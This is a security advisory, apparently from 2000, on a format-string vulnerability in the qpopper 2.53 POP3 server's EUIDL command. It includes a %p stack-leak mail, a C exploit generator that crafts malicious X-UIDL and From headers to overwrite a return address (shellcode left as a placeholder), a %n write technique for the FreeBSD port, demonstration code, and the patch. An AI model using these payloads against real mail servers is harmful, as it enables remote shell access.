Getting a remote shell from qpopper 2.53
Created: 2000-05-27
Article type: original
Submitted by:
Quack (QUACK_AT_XFOCUS.ORG)

Getting a remote shell from qpopper 2.53
Quack
Reference: Buffer0verflow Security Advisory #5 by prizm
* Description

Qpopper is a widely deployed POP3 server that lets users fetch their mail with any POP3 client.
It is commonly found on standard Unix systems.
* Problem

qpopper 2.53 has a bug that lets a remote user obtain a shell with gid=mail.
The problem is the call to pop_msg() that is made when a user issues the EUIDL command. Let's look at the qpopper
2.53 code:

-> pop_uidl.c, at line 150:
..............
    sprintf(buffer, "%d %s", msg_id, mp->uidl_str);
    if (nl = index(buffer, NEWLINE)) *nl = 0;
    sprintf(buffer, "%s %d %.128s", buffer, mp->length, from_hdr(p, mp));
    return (pop_msg(p, POP_SUCCESS, buffer));
                                    ^^^^^^
.................
The function pop_msg(), defined in pop_msg.c, is declared as pop_msg(POP *p, int stat,
const char *format, ...). So here the text the user entered becomes the format :)
OK, imagine the following situation:

mail from:
250 ok
rcpt to:
250 ok
data
354 okey, okey. End with "."
Subject: still trust qpop? =/
X-UIDL: AAAAAAAAAAAAAAAAAA
From: %p%p%p%p%p%p%p
test
.
250 blablabla ok, message accepted for delivery.
The user luser then connects to his POP account and issues the EUIDL command:

+OK QPOP (version 2.53) at b0f starting. <666.666@b0f>
user luser
+OK Password required for luser.
pass secret
+OK luser has 3 messages (1644 octets).
euidl 3
+OK 2 AAAAAAAAAAAAAAAAA 530 0xbfbfc9b0 0x804fd74 0xbfbfc9b0 0x212 0x8052e5e 0xbfbfd1e8 0x8057028

Yeah, that's from my FreeBSD box. As you can see, our %p%p%p%p%p%p%p were
interpreted as conversions by vsnprintf(), which pulled their "arguments" off the stack.
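The following is an added example (my own, not code from prizm's advisory or from the qpopper sources) that reproduces the bug class in a self-contained form: a hypothetical pop_msg_like() with the same "third argument is a printf format" contract as pop_msg(), the EUIDL reply built the way pop_uidl.c builds it, and the same reply built the way the advisory's patch does ("%s", buffer). The message number 3, the header text and the REPLY_MAX size are assumptions. Only "%%" is fed to the vulnerable path, because any other conversion reads arguments that were never passed.

```c
#include <stdarg.h>
#include <stdio.h>
#include <string.h>

#define POP_SUCCESS 1
#define REPLY_MAX   256

/* Hypothetical stand-in for qpopper's pop_msg(): like the real one it
   treats its third argument as a printf format. This toy version formats
   into out instead of writing to the client socket. */
static int pop_msg_like(char *out, size_t outlen, int stat,
                        const char *format, ...)
{
    va_list ap;
    int n = snprintf(out, outlen, "%s ", stat == POP_SUCCESS ? "+OK" : "-ERR");
    if (n < 0 || (size_t)n >= outlen)
        return -1;
    va_start(ap, format);
    vsnprintf(out + n, outlen - (size_t)n, format, ap); /* FreeBSD port: vsnprintf */
    va_end(ap);
    return 0;
}

/* The pattern from pop_uidl.c: buffer, built from mail headers the sender
   controls, is handed to pop_msg() as the format. msg_id is fixed at 3 here. */
void euidl_reply_vulnerable(char *out, size_t outlen, const char *uidl_and_from)
{
    char buffer[REPLY_MAX];
    snprintf(buffer, sizeof buffer, "%d %s", 3, uidl_and_from);
    pop_msg_like(out, outlen, POP_SUCCESS, buffer);
}

/* The advisory's patch: a constant format, buffer passed as an argument. */
void euidl_reply_fixed(char *out, size_t outlen, const char *uidl_and_from)
{
    char buffer[REPLY_MAX];
    snprintf(buffer, sizeof buffer, "%d %s", 3, uidl_and_from);
    pop_msg_like(out, outlen, POP_SUCCESS, "%s", buffer);
}

/* Count printf conversions in header text. On the vulnerable path each one
   is a stack read (%p, %s) or write (%n) the server never intended. */
int count_conversions(const char *s)
{
    int count = 0;
    for (; *s; s++) {
        if (*s != '%')
            continue;
        if (s[1] == '%') {      /* "%%" is a literal percent sign */
            s++;
            continue;
        }
        count++;
    }
    return count;
}

int main(void)
{
    /* Constructed header data: "%%" is the only conversion that is safe to
       feed the vulnerable path, since anything else reads missing arguments. */
    const char *hdr = "AAAA 530 100%% sure";
    char out[REPLY_MAX];

    euidl_reply_vulnerable(out, sizeof out, hdr);
    printf("vulnerable: %s\n", out);   /* "+OK 3 AAAA 530 100% sure" */
    euidl_reply_fixed(out, sizeof out, hdr);
    printf("fixed:      %s\n", out);   /* "+OK 3 AAAA 530 100%% sure" */
    printf("conversions in the advisory's From: line: %d\n",
           count_conversions("%p%p%p%p%p%p%p"));   /* 7 */
    return 0;
}
```

The vulnerable path turns the sender's "%%" into a single "%", proving the header text was parsed as a format; the fixed path leaves it untouched. count_conversions() is the check to run over any data that reaches a format position: a non-zero result on header text means the sender, not the server, decides what vsnprintf() does with the stack.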
* Exploitation

Is it exploitable? Yes, of course!
There is one small restriction, though: qpopper 2.53 is harder to exploit on FreeBSD than on Linux, because
the FreeBSD port changes the vsprintf() call in pop_msg.c to vsnprintf(). That makes a significant difference - but it is still exploitable, of course :)
Exploit
-------

/* qpop_euidl.c exploit by Prizm/Buffer0verflow Security
 *
 * Sample exploit for buffer overflow in qpopper 2.53.
 * This little proggie generates a mail u need to send.
 *
 * Standard disclaimer applies.
 * By the way, exploit is broken =) You NEED to insert shellcode.
 *
 * Mad greets to tf8 for pointing out the bug, and all other b0f members.
 * Greets to ussrlabs and adm
 * Check http://b0f.freebsd.lublin.pl/ for news.
 */
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

char shellcode[] = "imp";   /* placeholder: insert real shellcode (12 to 76 bytes) */

int main(int argc, char *argv[])
{
    int i;
    unsigned long ra = 0;

    if (argc != 2) {
        fprintf(stderr, "usage: %s return_addr\n", argv[0]);
        exit(0);
    }
    sscanf(argv[1], "%lx", &ra);
    if (!ra)
        return 1;
    if (sizeof(shellcode) < 12 || sizeof(shellcode) > 76) {
        fprintf(stderr, "bad shellcode\n");
        exit(0);
    }
    fprintf(stderr, "return address: 0x%.8lx\n", ra);

    /* the shellcode travels in X-UIDL, which qpopper copies into buffer */
    printf("X-UIDL: ");
    for (i = 0; i < (int)strlen(shellcode); i++)
        printf("%c", shellcode[i]);
    printf("\r\n");

    /* From: becomes the format string: "%.1000d" pushes the output past the
       end of buffer (vsprintf on Linux) and the repeated return address
       overwrites the saved return address on the stack */
    printf("From: %s", "%.1000d");
    for (i = 0; i < 50; i++)
        printf("%c%c%c%c", (int)(ra & 0xff), (int)((ra & 0xff00) >> 8),
               (int)((ra & 0xff0000) >> 16), (int)((ra & 0xff000000) >> 24));
    printf("@test\r\n");
    printf("Subject: test\r\n\r\nhuh?\r\n.\r\n");
    return 0;
}

Exploiting the FreeBSD port of qpopper
--------------------------------------

This is not so easy, because vsprintf() has been replaced by vsnprintf(), so we
cannot overflow the buffer. But we can still control things - remember %n?
The trick works like this. Look at the code below: can you see why it prints 2000
rather than sizeof(b)?

--- cut here ---
#include <stdio.h>

int main(void)
{
    int s = 1;          /* meant as a canary next to b */
    char b[1024];
    int q;

    snprintf(b, sizeof(b), "%.2000d%n", 1, &q);
    return printf("%d, overflowed? %s\n", q, (s == 1 ? "no" : "yes"));
}
--- cut here ---

On my FreeBSD 3.4 box this prints:

2000, overflowed? no

Hey, at first I expected to see 1024, but you know - a program does not always
behave the way you'd assume. See below, perhaps it helps.

Exploiting it:

a) Find out the exact location of your input on the stack.

b) Compose a message with X-UIDL and From: fields:

   X-UIDL: PPRETARETARETA
   From:

   where:
   "PP"        - padding (two to three bytes)
   "RETA"      - the address to return to (the shellcode)
   "SHELLCODE" - guess :)
   "RETURN"    - the return address

c) If you need a FreeBSD version of the exploit - write it yourself :)

* Vulnerable versions

2.53 (others? unknown...)

* Patch

Download qpopper 3.1 from
http://www.eudora.com/freeware/qpop.html#current
where this problem has been fixed. Or patch the source yourself: at lines 150 and 62 of pop_uidl.c, change

    return (pop_msg(p, POP_SUCCESS, buffer));

into

    return (pop_msg(p, POP_SUCCESS, "%s", buffer));
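Added example (my own code, not prizm's or the qpopper project's) that carries the snprintf/%n observation above one step further and covers step b) of the procedure: the value %n stores is the untruncated count, so a bounded vsnprintf() still lets the sender choose the integer that gets written through whatever pointer %n consumes. Here the target pointer is passed explicitly; in the attack it is the "RETA" address planted in the header and located on the stack in step a). The width is supplied with "*" so the format stays a string literal (an assumption made so the demo runs as-is on current toolchains; the real format in the From: header is "%.Nd%n"). The 64-byte buffer and the values 2000 and 70000 are constructed inputs.

```c
#include <stdio.h>
#include <string.h>

/* Number of characters %n records when width characters are requested but
   only sizeof buf - 1 fit: the untruncated count, as in the FreeBSD test. */
int n_recorded(int width)
{
    char buf[64];
    int n = -1;
    /* width is passed via '*' rather than embedded in the format so the
       format itself remains a literal; the attacker's real format in a mail
       header would read "%.Nd%n" instead. */
    snprintf(buf, sizeof buf, "%*d%n", width, 1, &n);
    return n;
}

/* Number of characters that actually landed in the bounded buffer. */
int n_stored(int width)
{
    char buf[64];
    int n = -1;
    snprintf(buf, sizeof buf, "%*d%n", width, 1, &n);
    return (int)strlen(buf);
}

/* A bounded vsnprintf does not stop %n: the count written through target is
   chosen by the width, not limited by the buffer. Returns 1 if target now
   holds exactly value (value must be positive: a negative width means
   left-justify and would store a different count). */
int write_via_n(int *target, int value)
{
    char buf[64];
    if (value < 1)
        return 0;
    *target = 0;
    snprintf(buf, sizeof buf, "%*d%n", value, 1, target);
    return *target == value;
}

int main(void)
{
    int target = 0;
    printf("recorded %d, stored %d\n", n_recorded(2000), n_stored(2000)); /* 2000, 63 */
    write_via_n(&target, 70000);
    printf("target = %d\n", target);   /* 70000 */
    return 0;
}
```

With sprintf() the same width overflows the buffer; with snprintf() nothing past 63 bytes is stored, yet %n still delivers the full count. That is why the FreeBSD port, which only swapped vsprintf() for vsnprintf() and kept user data as the format, remains exploitable: the fix has to be the "%s" change in the patch, not a bounded buffer.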